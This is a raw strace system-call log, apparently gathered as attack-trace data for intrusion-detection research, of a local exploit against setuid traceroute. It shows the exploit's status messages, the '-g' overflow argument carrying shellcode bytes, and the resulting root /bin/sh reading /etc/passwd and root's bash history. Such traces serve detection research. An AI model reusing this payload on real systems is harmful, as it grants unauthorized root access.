797   18:54:37 [400a9d7b] execve("/usr/sbin/traceroute", ["/usr/sbin/traceroute", "-g", "1", "-g", "1"], [/* 0 vars */]) = 0 <0.000253>
797   18:54:37 [4000f78c] brk(0)        = 0x804cedc <0.000007>
797   18:54:37 [4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000 <0.000012>
797   18:54:37 [4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) <0.000023>
797   18:54:37 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000016>
797   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000008>
797   18:54:37 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000011>
797   18:54:37 [4000ee8d] close(4)      = 0 <0.000007>
797   18:54:37 [4000ee54] open("/lib/libc.so.6", O_RDONLY) = 4 <0.000020>
797   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0 <0.000007>
797   18:54:37 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096 <0.000031>
797   18:54:37 [4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40018000 <0.000014>
797   18:54:37 [4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0 <0.000012>
797   18:54:37 [4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0xec000) = 0x40105000 <0.000015>
797   18:54:37 [4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000 <0.000010>
797   18:54:37 [4000ee8d] close(4)      = 0 <0.000006>
797   18:54:37 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0 <0.000013>
797   18:54:37 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0 <0.000023>
797   18:54:37 [4000f891] munmap(0x40015000, 12210) = 0 <0.000021>
797   18:54:37 [400ca7fd] personality(PER_LINUX) = 0 <0.000008>
797   18:54:37 [400aa257] getpid()      = 797 <0.000007>
797   18:54:37 [400c4a6c] brk(0)        = 0x804cedc <0.000009>
797   18:54:37 [400c4a6c] brk(0x804cefc) = 0x804cefc <0.000006>
797   18:54:37 [400c4a6c] brk(0x804d000) = 0x804d000 <0.000006>
797   18:54:37 [400c4a6c] brk(0x804e000) = 0x804e000 <0.000014>
796   18:54:37 [400beb14] write(1, "VULN!\n", 6) = 6 <0.000055>
796   18:54:37 [400beb14] write(1, "Lets ride...\n", 13) = 13 <0.000048>
796   18:54:37 [400beb14] write(1, "Trying bfffff89\n", 16) = 16 <0.000048>
796   18:54:37 [400a9d7b] execve("/usr/sbin/traceroute", ["exploited", "-g", "1.2.34", "-g", "1.2.3.17 sex\374\377\377\377\270\307\4\10\211\377\377\277"..., "\353\n\353\n\353\n\353\n\353\n\353\n\353\n\353\n\353\n"...], [/* 0 vars */]) = 0 <0.000294>
796   18:54:37 [4000f78c] brk(0)        = 0x804cedc <0.000007>
796   18:54:37 [4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000 <0.000011>
796   18:54:37 [4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) <0.000019>
796   18:54:37 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000016>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000008>
796   18:54:37 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000012>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000008>
796   18:54:37 [4000ee54] open("/lib/libc.so.6", O_RDONLY) = 4 <0.000019>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0 <0.000008>
796   18:54:37 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096 <0.000031>
796   18:54:37 [4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40018000 <0.000014>
796   18:54:37 [4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0 <0.000014>
796   18:54:37 [4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0xec000) = 0x40105000 <0.000014>
796   18:54:37 [4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000 <0.000010>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000008>
796   18:54:37 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0 <0.000013>
796   18:54:37 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0 <0.000020>
796   18:54:37 [4000f891] munmap(0x40015000, 12210) = 0 <0.000020>
796   18:54:37 [400ca7fd] personality(PER_LINUX) = 0 <0.000007>
796   18:54:37 [400aa257] getpid()      = 796 <0.000007>
796   18:54:37 [400c4a6c] brk(0)        = 0x804cedc <0.000007>
796   18:54:37 [400c4a6c] brk(0x804cefc) = 0x804cefc <0.000007>
796   18:54:37 [400c4a6c] brk(0x804d000) = 0x804d000 <0.000005>
796   18:54:37 [400c4a6c] brk(0x804e000) = 0x804e000 <0.000014>
796   18:54:37 [bfffffd3] execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = 0 <0.000278>
796   18:54:37 [4000f78c] brk(0)        = 0x80994a0 <0.000006>
796   18:54:37 [4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000 <0.000011>
796   18:54:37 [4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) <0.000020>
796   18:54:37 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000014>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000010>
796   18:54:37 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000012>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000007>
796   18:54:37 [4000ee54] open("/lib/libtermcap.so.2", O_RDONLY) = 4 <0.000022>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=12224, ...}) = 0 <0.000008>
796   18:54:37 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\16\0"..., 4096) = 4096 <0.000040>
796   18:54:37 [4000f84d] old_mmap(NULL, 15304, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40018000 <0.000010>
796   18:54:37 [4000f8d4] mprotect(0x4001b000, 3016, PROT_NONE) = 0 <0.000011>
796   18:54:37 [4000f84d] old_mmap(0x4001b000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x2000) = 0x4001b000 <0.000014>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000007>
796   18:54:37 [4000ee54] open("/lib/libc.so.6", O_RDONLY) = 4 <0.000023>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0 <0.000007>
796   18:54:37 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096 <0.000032>
796   18:54:37 [4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4001c000 <0.000012>
796   18:54:37 [4000f8d4] mprotect(0x40109000, 30812, PROT_NONE) = 0 <0.000009>
796   18:54:37 [4000f84d] old_mmap(0x40109000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0xec000) = 0x40109000 <0.000013>
796   18:54:37 [4000f84d] old_mmap(0x4010d000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x4010d000 <0.000010>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000007>
796   18:54:37 [4000f8d4] mprotect(0x4001c000, 970752, PROT_READ|PROT_WRITE) = 0 <0.000015>
796   18:54:37 [4000f8d4] mprotect(0x4001c000, 970752, PROT_READ|PROT_EXEC) = 0 <0.000024>
796   18:54:37 [4000f891] munmap(0x40015000, 12210) = 0 <0.000025>
796   18:54:37 [400ce7fd] personality(PER_LINUX) = 0 <0.000007>
796   18:54:37 [400ae257] getpid()      = 796 <0.000007>
796   18:54:37 [400ae2b7] getuid()      = 0 <0.000006>
796   18:54:37 [400ae317] getgid()      = 0 <0.000005>
796   18:54:37 [400ae2e7] geteuid()     = 0 <0.000006>
796   18:54:37 [400ae347] getegid()     = 0 <0.000005>
796   18:54:37 [400c8a6c] brk(0)        = 0x80994a0 <0.000007>
796   18:54:37 [400c8a6c] brk(0x80994c0) = 0x80994c0 <0.000006>
796   18:54:37 [400c8a6c] brk(0x809a000) = 0x809a000 <0.000006>
796   18:54:37 [400a4f7d] time(NULL)    = 1142549677 <0.000006>
796   18:54:37 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000017>
796   18:54:37 [400c8b54] ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000008>
796   18:54:37 [4003aae2] rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000010>
796   18:54:37 [4003aae2] rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGTERM, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGTERM, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGHUP, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000008>
796   18:54:37 [4003aae2] rt_sigaction(SIGINT, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGILL, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGTRAP, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGABRT, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGFPE, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGBUS, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGSEGV, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGUNUSED, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGPIPE, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGALRM, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGTERM, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGXCPU, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGXFSZ, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGVTALRM, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGPROF, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGUSR1, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGUSR2, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003acb5] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGTERM, {SIG_IGN}, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGTSTP, {SIG_IGN}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGTTOU, {SIG_IGN}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGTTIN, {SIG_IGN}, {SIG_DFL}, 8) = 0 <0.000006>
796   18:54:37 [400cedc2] socket(PF_UNIX, SOCK_STREAM, 0) = 4 <0.000031>
796   18:54:37 [400cea82] connect(4, {sin_family=AF_UNIX, path="                                                                                       /var/run/.nscd_socket"}, 110) = -1 ECONNREFUSED (Connection refused) <0.000027>
796   18:54:37 [400c2a8d] close(4)      = 0 <0.000039>
796   18:54:37 [400c2a24] open("/etc/nsswitch.conf", O_RDONLY) = 4 <0.000024>
796   18:54:37 [400c1c8c] fstat64(0x4, 0xbffffba0) = -1 ENOSYS (Function not implemented) <0.000007>
796   18:54:37 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=1744, ...}) = 0 <0.000008>
796   18:54:37 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000017>
796   18:54:37 [400c2ad4] read(4, "#\n# /etc/nsswitch.conf\n#\n# An ex"..., 4096) = 1744 <0.000046>
796   18:54:37 [400c8a6c] brk(0x809b000) = 0x809b000 <0.000010>
796   18:54:37 [400c2ad4] read(4, "", 4096) = 0 <0.000007>
796   18:54:37 [400c2a8d] close(4)      = 0 <0.000009>
796   18:54:37 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000016>
796   18:54:37 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000024>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000008>
796   18:54:37 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000015>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000006>
796   18:54:37 [4000ee54] open("/lib/libnss_files.so.2", O_RDONLY) = 4 <0.000025>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=246652, ...}) = 0 <0.000008>
796   18:54:37 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p \0\000"..., 4096) = 4096 <0.000036>
796   18:54:37 [4000f84d] old_mmap(NULL, 36384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40111000 <0.000013>
796   18:54:37 [4000f8d4] mprotect(0x40119000, 3616, PROT_NONE) = 0 <0.000011>
796   18:54:37 [4000f84d] old_mmap(0x40119000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x7000) = 0x40119000 <0.000013>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000006>
796   18:54:37 [4000f891] munmap(0x40015000, 12210) = 0 <0.000015>
796   18:54:37 [400c2a24] open("/etc/passwd", O_RDONLY) = 4 <0.000028>
796   18:54:37 [400c2ce4] fcntl(4, F_GETFD) = 0 <0.000007>
796   18:54:37 [400c2ce4] fcntl(4, F_SETFD, FD_CLOEXEC) = 0 <0.000006>
796   18:54:37 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=704, ...}) = 0 <0.000008>
796   18:54:37 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000014>
796   18:54:37 [400c2ad4] read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 704 <0.000036>
796   18:54:37 [400c2a8d] close(4)      = 0 <0.000009>
796   18:54:37 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000010>
796   18:54:37 [400ad7ed] uname({sys="Linux", node="localhost.localdomain", ...}) = 0 <0.000013>
796   18:54:37 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000024>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000008>
796   18:54:37 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000017>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000006>
796   18:54:37 [4000ee54] open("/lib/libnss_nisplus.so.2", O_RDONLY) = 4 <0.000049>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=252234, ...}) = 0 <0.000008>
796   18:54:37 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\37\0"..., 4096) = 4096 <0.000036>
796   18:54:37 [4000f84d] old_mmap(NULL, 41972, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4011a000 <0.000014>
796   18:54:37 [4000f8d4] mprotect(0x40123000, 5108, PROT_NONE) = 0 <0.000011>
796   18:54:37 [4000f84d] old_mmap(0x40123000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x8000) = 0x40123000 <0.000014>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000007>
796   18:54:37 [4000ee54] open("/lib/libnsl.so.1", O_RDONLY) = 4 <0.000026>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=370141, ...}) = 0 <0.000008>
796   18:54:37 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20?\0\000"..., 4096) = 4096 <0.000035>
796   18:54:37 [4000f84d] old_mmap(NULL, 88104, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40125000 <0.000012>
796   18:54:37 [4000f8d4] mprotect(0x40137000, 14376, PROT_NONE) = 0 <0.000009>
796   18:54:37 [4000f84d] old_mmap(0x40137000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x11000) = 0x40137000 <0.000013>
796   18:54:37 [4000f84d] old_mmap(0x40139000, 6184, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40139000 <0.000011>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000008>
796   18:54:37 [4000f891] munmap(0x40015000, 12210) = 0 <0.000017>
796   18:54:37 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000028>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000009>
796   18:54:37 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000015>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000006>
796   18:54:37 [4000ee54] open("/lib/libnss_nis.so.2", O_RDONLY) = 4 <0.000022>
796   18:54:37 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=255963, ...}) = 0 <0.000007>
796   18:54:37 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`\37\0\000"..., 4096) = 4096 <0.000037>
796   18:54:37 [4000f84d] old_mmap(NULL, 38488, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4013b000 <0.000015>
796   18:54:37 [4000f8d4] mprotect(0x40143000, 5720, PROT_NONE) = 0 <0.000013>
796   18:54:37 [4000f84d] old_mmap(0x40143000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x7000) = 0x40143000 <0.000014>
796   18:54:37 [4000ee8d] close(4)      = 0 <0.000007>
796   18:54:37 [4000f891] munmap(0x40015000, 12210) = 0 <0.000015>
796   18:54:37 [400c8a6c] brk(0x809c000) = 0x809c000 <0.000012>
796   18:54:37 [400c8a6c] brk(0x809e000) = 0x809e000 <0.000010>
796   18:54:37 [400c31d4] getcwd("/home/kayacik/exploit", 4095) = 22 <0.000012>
796   18:54:37 [400ae257] getpid()      = 796 <0.000006>
796   18:54:37 [400ae287] getppid()     = 795 <0.000007>
796   18:54:37 [400ae2b7] getuid()      = 0 <0.000005>
796   18:54:37 [400c2a24] open("/etc/passwd", O_RDONLY) = 4 <0.000028>
796   18:54:37 [400c2ce4] fcntl(4, F_GETFD) = 0 <0.000007>
796   18:54:37 [400c2ce4] fcntl(4, F_SETFD, FD_CLOEXEC) = 0 <0.000006>
796   18:54:37 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=704, ...}) = 0 <0.000007>
796   18:54:37 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000017>
796   18:54:37 [400c2ad4] read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 704 <0.000034>
796   18:54:37 [400c2a8d] close(4)      = 0 <0.000011>
796   18:54:37 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000011>
796   18:54:37 [400ae607] getpgrp()     = 795 <0.000006>
796   18:54:37 [400c2fad] dup(2)        = 4 <0.000009>
796   18:54:37 [400c8511] getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=1024}) = 0 <0.000006>
796   18:54:37 [400c2ce4] fcntl(255, F_GETFD) = -1 EBADF (Bad file descriptor) <0.000006>
796   18:54:37 [400c2ff1] dup2(4, 255)  = 255 <0.000020>
796   18:54:37 [400c2a8d] close(4)      = 0 <0.000007>
796   18:54:37 [400c8b54] ioctl(255, TIOCGPGRP, [795]) = 0 <0.000014>
796   18:54:37 [400ae257] getpid()      = 796 <0.000006>
796   18:54:37 [400ae5d1] setpgid(0, 796) = 0 <0.000007>
796   18:54:37 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TSTP TTIN TTOU], [], 8) = 0 <0.000009>
796   18:54:37 [400c8b54] ioctl(255, TIOCSPGRP, [796]) = 0 <0.000026>
796   18:54:37 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
796   18:54:37 [400c2ce4] fcntl(255, F_SETFD, FD_CLOEXEC) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGCHLD, {0x805c190, [], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000009>
796   18:54:37 [400c8b54] ioctl(255, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000013>
796   18:54:37 [400c16cd] stat("/var/spool/mail/root", 0xbffffdb0) = -1 ENOENT (No such file or directory) <0.000037>
796   18:54:37 [400a4f7d] time(NULL)    = 1142549677 <0.000007>
796   18:54:37 [400c2a24] open("/root/.bash_history", O_RDONLY) = 4 <0.000026>
796   18:54:37 [400c180d] fstat(4, {st_mode=S_IFREG|0600, st_size=2000, ...}) = 0 <0.000007>
796   18:54:37 [400c2ad4] read(4, "whoami\nexit\nexit\nftp localhost\n/"..., 2000) = 2000 <0.000026>
796   18:54:37 [400c2a8d] close(4)      = 0 <0.000009>
796   18:54:37 [400c16cd] stat("/root/.bash_history", {st_mode=S_IFREG|0600, st_size=2000, ...}) = 0 <0.000014>
796   18:54:37 [400c2a24] open("/root/.bash_history", O_RDONLY) = 4 <0.000014>
796   18:54:37 [400c180d] fstat(4, {st_mode=S_IFREG|0600, st_size=2000, ...}) = 0 <0.000006>
796   18:54:37 [400c2ad4] read(4, "whoami\nexit\nexit\nftp localhost\n/"..., 2000) = 2000 <0.000018>
796   18:54:37 [400c2a8d] close(4)      = 0 <0.000007>
796   18:54:37 [400c8a6c] brk(0x809f000) = 0x809f000 <0.000016>
796   18:54:37 [400c8a6c] brk(0x80a0000) = 0x80a0000 <0.000010>
796   18:54:37 [400c8b54] ioctl(255, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000013>
796   18:54:37 [400c2ce4] fcntl(0, F_GETFL) = 0x2 (flags O_RDWR) <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000007>
796   18:54:37 [400a4f7d] time(NULL)    = 1142549677 <0.000006>
796   18:54:37 [400ae2e7] geteuid()     = 0 <0.000007>
796   18:54:37 [400ae2e7] geteuid()     = 0 <0.000006>
796   18:54:37 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TTOU], [], 8) = 0 <0.000008>
796   18:54:37 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000005>
